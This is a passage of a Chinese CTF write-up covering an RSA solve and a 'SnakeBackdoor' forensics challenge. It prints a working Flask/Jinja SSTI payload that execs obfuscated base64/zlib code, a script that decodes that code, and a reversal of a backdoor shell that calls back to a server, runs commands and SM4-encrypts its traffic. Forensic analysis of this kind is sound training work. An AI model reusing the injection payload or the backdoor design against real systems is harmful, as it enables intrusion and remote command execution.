c=657984921229942454933933403447729006306657607710326864301226455143743298424203173231485254106370042482797921667656700155904329772383820736458855765136793243316671212869426397954684784861721375098512569633961083815312918123032774700110069081262242921985864796328969423527821139281310369981972743866271594590344539579191695406770264993187783060116166611986577690957583312376226071223036478908520539670631359415937784254986105845218988574365136837803183282535335170744088822352494742132919629693849729766426397683869482842748401000853783134170305075124230522253670782186531697976487673160305610021244587265868919495629
phi = (p-1)*(q-1)*(r-1)*(s-1)
e = 65537
d = pow(e,-1,phi)
m = pow(c,d,n1)
print(long_to_bytes(m))
# b'flag{fak3_r5a_0f_euler_ph1_of_RSA_040a2d35}\x7fp\xcb\xd6\x004"A+\x8crj\xead\x1a\x1f\x8e\xe0\xd9\xadO\x99\xe93\xdb\xef\x8b\x080aj\x9b)rk(C\xd3\xa0\x03\xec\x91r3\x03x\xf3\x8b\x94\x14y\x0bW\x11\x0bLd\xd0\x87\xed\r\x90\x8c\xf7}5Lwe\xd9N\xb6\xfd\x92(p}\x18A[0\x116\xa9\xc6\xfdLZ<@\n\x89d\xc6\xe7\x04\xc5)\x81)\x14\x86E\xca]\xd2\x02c\x1a\xadF\xc0\xe2*\x16y\x16\xb4\xf5K\xec\xaf\xe9\xa3\xf3I\xe6a\x94%\xae5Y\xb6\xa7N!\xf79\xca\xe5^cL\x10 \xbe\xfd\x800\'Il\x9b\x86\xd9\xfcd\xd5\x9e\xa9S\x8c\x80\xc1cM\x16`/\x04\xe8\xa7\xea\xbf+\x81Jw-@T\xe9\xeb\x97\x10h$\x8c\xa7\x9bN\x91\x18u.\xe1\t\xc8\xdc\xc4n%\x9d\x0e\x8a\x05T \xc4\xb0m\xde'</code></pre>
<p>flag{fak3_r5a_0f_euler_ph1_of_RSA_040a2d35}</p>
<h1>Misc</h1>
<h2>SnakeBackdoor-1</h2>
<p><img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912090844.png" alt="" /></p>
<h2>SnakeBackdoor-2</h2>
<p><img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912091646.png" alt="" /></p>
<h2>SnakeBackdoor-3</h2>
<pre><code class="language-sql">preview_content={{url_for.__globals__['__builtins__']['exec']("import base64; exec(base64.b64decode('XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ=='))", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}</code></pre>
<p><img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912100023.png" alt="" /></p>
<pre><code class="language-python">import zlib, base64, re
def decrypt(s):
while m := re.search(r"\(b'([^']+)'\)", s):
try:
s = zlib.decompress(base64.b64decode(m[1][::-1])).decode()
except:
break
return s
code = decrypt("""_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));
exec((_)(b'=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'))""")
print(code)</code></pre>
<h2>SnakeBackdoor-4</h2>
<p><img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912103518.png" alt="" />
解得压缩包密码
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912104497.png" alt="" />
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912105485.png" alt="" />
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912110463.png" alt="" /></p>
<h2>SnakeBackdoor-5</h2>
<p>对shell的逆向:</p>
<ol>
<li>连接阶段
<ul>
<li>连接到服务器 192.168.1.201:58782</li>
<li>接收4字节种子,并进行字节序转换</li>
<li>使用种子初始化随机数生成器</li>
</ul></li>
<li>密钥生成:SM4
<ul>
<li>生成4个随机数作为初始密钥</li>
<li>生成加密密钥,存储在v9中</li>
<li>生成解密密钥,存储在v10中
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912112728.png" alt="" />
种子是0x34952046
<pre><code class="language-c">int main()
{
unsigned int buf[4];
unsigned int seed = 0x34952046;
srand(seed);
for(int i=0;i<4;i++)
{
buf[i] = rand();
}
for(int i=0;i<16;i++)
{
printf("%02x", key[i]);
}
return 0;
}
//ac46fb610b313b4f32fc642d8834b456</code></pre>
<h2>SnakeBackdoor-6</h2>
<p>木马程序shell的加解密流程
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912114653.png" alt="" /></p></li>
</ul></li>
<li>接收命令数据</li>
<li>dec_subkey解密命令(SM4_ECB解密)</li>
<li>移除PKCS#7填充</li>
<li>执行命令:popen(command, "r")</li>
<li>读取命令输出</li>
<li>PKCS#7填充输出</li>
<li>enc_subkey加密输出(SM4_ECB加密)</li>
<li>发送加密结果回服务器
SM4的Sbox换表,复制下来,编写脚本解密流量。
<pre><code class="language-python">
import binascii</code></pre></li>
</ol>
<p>class SM4:</p>
<h1>S盒</h1>
<pre><code>SBOX = [
0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6,
0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05, 0x2B, 0x67, 0x9A, 0x76,
0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86,
0x06, 0x99, 0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A,
0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62, 0xE4, 0xB3,
0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA,
0x75, 0x8F, 0x3F, 0xA6, 0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73,
0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,
0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB,
0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35, 0x1E, 0x24, 0x0E, 0x5E,
0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x21,
0x78, 0x87, 0xD4, 0x00, 0x46, 0x57, 0x9F, 0xD3, 0x27, 0x52,
0x4C, 0x36, 0x02, 0xE7, 0xA0, 0xC4, 0xC8, 0x9E, 0xEA, 0xBF,
0x8A, 0xD2, 0x40, 0xC7, 0x38, 0xB5, 0xA3, 0xF7, 0xF2, 0xCE,
0xF9, 0x61, 0x15, 0xA1, 0xE0, 0xAE, 0x5D, 0xA4, 0x9B, 0x34,
0x1A, 0x55, 0xAD, 0x93, 0x32, 0x30, 0xF5, 0x8C, 0xB1, 0xE3,
0x1D, 0xF6, 0xE2, 0x2E, 0x82, 0x66, 0xCA, 0x60, 0xC0, 0x29,
0x23, 0xAB, 0x0D, 0x53, 0x4E, 0x6F, 0xD5, 0xDB, 0x39, 0xB8,
0x31, 0x11, 0x0C, 0x5A, 0xCB, 0x3E, 0x0A, 0x45, 0xE5, 0x94,
0x77, 0x5B, 0x8D, 0x6D, 0x48, 0x41, 0x10, 0xBD, 0x09, 0xC1,
0x4A, 0x89, 0x0D, 0x6E, 0x97, 0xA1, 0x1D, 0x16, 0x0A, 0xD9,
0x88, 0x6A, 0x96, 0xD1, 0x6B, 0x32, 0x02, 0x35, 0x46, 0x06,
0x7D, 0x65, 0x49, 0x8C, 0xF0, 0x3E, 0x2D, 0x7A, 0x15, 0xFF,
0x05, 0x8E, 0x01, 0x84, 0x3C, 0x3A, 0x38, 0x53, 0x87, 0x7B,
0x0B, 0x2B, 0x7E, 0x0F, 0xF6, 0x69, 0xA8, 0x5A, 0xB5, 0x4C,
0x1B, 0x39, 0x7F, 0x08, 0x8D, 0x1C
]
# 系统参数FK
FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc]
# 固定参数CK
CK = [
0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
]
@staticmethod
def left_rotate(x, n):
"""循环左移"""
return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
@staticmethod
def tau(a):
"""非线性变换tau,应用S盒"""
b0 = SM4.SBOX[(a >> 24) & 0xFF]
b1 = SM4.SBOX[(a >> 16) & 0xFF]
b2 = SM4.SBOX[(a >> 8) & 0xFF]
b3 = SM4.SBOX[a & 0xFF]
return (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
@staticmethod
def l(byte):
"""线性变换L"""
return byte ^ SM4.left_rotate(byte, 2) ^ SM4.left_rotate(byte, 10) ^ \
SM4.left_rotate(byte, 18) ^ SM4.left_rotate(byte, 24)
@staticmethod
def l_prime(byte):
"""用于密钥扩展的线性变换L'"""
return byte ^ SM4.left_rotate(byte, 13) ^ SM4.left_rotate(byte, 23)
@staticmethod
def t(byte):
"""合成变换T"""
return SM4.l(SM4.tau(byte))
@staticmethod
def t_prime(byte):
"""用于密钥扩展的合成变换T'"""
return SM4.l_prime(SM4.tau(byte))
@staticmethod
def _bytes_to_words(data):
"""将字节转换为字列表"""
words = []
for i in range(0, len(data), 4):
#word = (data[i] << 24) | (data[i+1] << 16) | (data[i+2] << 8) | data[i+3]
word = (data[i+3] << 24) | (data[i+2] << 16) | (data[i+1] << 8) | data[i]
words.append(word)
return words
@staticmethod
def _words_to_bytes(words):
"""将字列表转换为字节"""
result = bytearray()
for word in words:
# result.append((word >> 24) & 0xFF)
# result.append((word >> 16) & 0xFF)
# result.append((word >> 8) & 0xFF)
# result.append(word & 0xFF)
result.append(word & 0xFF)
result.append((word >> 8) & 0xFF)
result.append((word >> 16) & 0xFF)
result.append((word >> 24) & 0xFF)
return bytes(result)
@staticmethod
def key_expansion(key):
"""密钥扩展"""
# 将密钥转换为4个32位字
mk = SM4._bytes_to_words(key)
k = [mk[i] ^ SM4.FK[i] for i in range(4)]
rk = []
for i in range(32):
# 密钥扩展函数
tmp = k[i+1] ^ k[i+2] ^ k[i+3] ^ SM4.CK[i]
tmp = SM4.t_prime(tmp)
k.append(k[i] ^ tmp)
rk.append(k[i+4])
return rk
@staticmethod
def _one_round(x, rk):
"""一轮加密/解密"""
x0, x1, x2, x3 = x
# F函数
tmp = x1 ^ x2 ^ x3 ^ rk
tmp = SM4.t(tmp)
x4 = x0 ^ tmp
return [x1, x2, x3, x4]
@staticmethod
def _crypt(input_data, rk):
"""加/解密核心函数"""
# 将输入数据转换为4个32位字
x = SM4._bytes_to_words(input_data)
# 32轮迭代
for i in range(32):
x = SM4._one_round(x, rk[i])
# 反序变换
x = x[::-1]
return SM4._words_to_bytes(x)
@staticmethod
def encrypt_block(plaintext, key):
"""加密一个块"""
rk = SM4.key_expansion(key)
return SM4._crypt(plaintext, rk)
@staticmethod
def decrypt_block(ciphertext, key):
"""解密一个块"""
rk = SM4.key_expansion(key)
# 解密时使用反序的轮密钥
rk = rk[::-1]
return SM4._crypt(ciphertext, rk)</code></pre>
<p>def sm4_decrypt_ECB(hex_key, hex_ciphertext):</p>
<pre><code># 检查密钥长度
if len(hex_key) != 32:
raise ValueError("密钥长度不符")
# 转换密钥和密文
key = binascii.unhexlify(hex_key)
ciphertext = binascii.unhexlify(hex_ciphertext)
# 检查密文长度是否为16字节的倍数
if len(ciphertext) % 16 != 0:
raise ValueError("密文长度必须是16字节的倍数")
# 分块解密
plaintext_blocks = []
block_size = 16
for i in range(0, len(ciphertext), block_size):
block = ciphertext[i:i+block_size]
plaintext_block = SM4.decrypt_block(block, key)
plaintext_blocks.append(plaintext_block)
# 合并所有块
plaintext = b''.join(plaintext_blocks)
return binascii.hexlify(plaintext).decode()</code></pre>
<p>key = "ac46fb610b313b4f32fc642d8834b456"
chiper_list = [
"49b351855f211b85bd012f80ce8ed5b3",
"2cc5becb37ca595a89445461c6512efc",
"b863696da0c6bb28da46e09069dd644f",
"87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7",
"b7c88bb0d92308a57f83d08a90ae024c",
"91fc3c4dc278b1afc5636adeca578f3fe37c16fa66fae433d0d7eb331e7926025ad84833f28fc2641bf05e058be36ed06b3ba79fb66a1ae4192c51152e87a1c6abf66f0a1038689d2137f94d6a686b946120ea2d6fbe312786411b701a353ab035de9c7dc81abfa0dfef55c14cd1f99e07cc2bccec85db48d820038d8c1273024cd80f99e761e2dc2ca5f79f97eb5e01c74a7807ba9f29d99338ea1962daba592f2f212ca8686cf37880755f82949cce1e38a7cd2c8f4a79e5a5b640375a94faa0dd2df11225df777845781f0562aab86e09effa9d6254ac8db8853036f680c37d9a047eafd0b65d7b8715cdd7f9becf3046afd113dc0b8b714b002cafc2482c4f240dab7cfa61ea30b3d4595b67563fde635bbd243f3ea8cca3d6bad779161939dd3acd3de84e9f0345f8e4c7b1dd0909922334bbbc0ccd412b8d8216337b515ad84833f28fc2641bf05e058be36ed08c073a5d9d24304eaf50c29d1f3cde1893acc5e4ba171ed4d1474d3f0046208ba565589ace3ecd59e248c22663b789ff5ff9eb73ea4fff8399159d10f689487d553333ce4ec0c0c568a5f532a015a6f1801f0d820a0b8a744b915248b842a2448d9b6d2d0493c7e8a32b86c05a26127a02bbb99ba83f410b1c2b9bbc1b5e39a5558f467eebd32b38a3e208c2534f74b450e412c2ab730ec45b224a2ba5255e24fd831db1d900c8a57967b8ad6993fb3a9b2de1d2d6093eb14a02ddd4cb29275b4cd80f99e761e2dc2ca5f79f97eb5e01ae78b840270ec94dd8eaeb7d15b9b74406f4e96257e0eec382482d4dcfb64257b9e83711e847957323fedb65b189afe150ae2213b7c9d2788dce7ba88cf8774a9bbe15c3832f0c136b1397209a7d6a9f37d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0c81a54b98f519ef41ce3775f5b2c26c7ad644797d69604a9fd412ae25a28aec737d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0158df499dc5f4de223e3dca72bbf66f48ac1fc75b1be3cc2e4de7d370f88778a006daefea44d62d389eff227e4d031124cd80f99e761e2dc2ca5f79f97eb5e01507836a14c3f3e83d0a317cd2ab8048eba52c6ca5e547ff797fca0cd47c62f4b7356b3bc38bc81e646000cf069b2be56d9fe59bcf4063d0a0363b9209c4f3860c90967283e1b364810145ed6e7525074a1a2527c05163cd8d49595c493a9bc5e5d480f143d8f892dfd8f90b3e8d3ea20352c9d0ad901cc079bf2a592ae4c58be125fff2fb31ecdcd95dc2fcdefdf1c6101dabec17b13f2d04eb8851a3115be66d1778dfb4003a9f705ad133b196c32404734c892cda46767181cf7a0a38fb8ac6e0a04a6bff4b1e8a7bfdabe5ddabbf62f934f8f91898a41dd0a0fd7c83eb55d27fe795766e9fcf20b8b885081848690e58d3748a157c7801a3d5c42db28cebf582760ac945ac0fc2b72edfc43c01c919b5a749a422da155198cbe9e3a2806a32a4e4a8590bbcf0496b0e13a8be7fbb69d55fc3541905d448499cd88edf0c58f59205e9f89a115e0ca9b5c3ebd9415c631acc7f6b9de54a40a9fa7d606f95e4cd62cd0cb2eb4feb350d04c46ce6f8b8d0eaf46208b3b4d4508812cd908b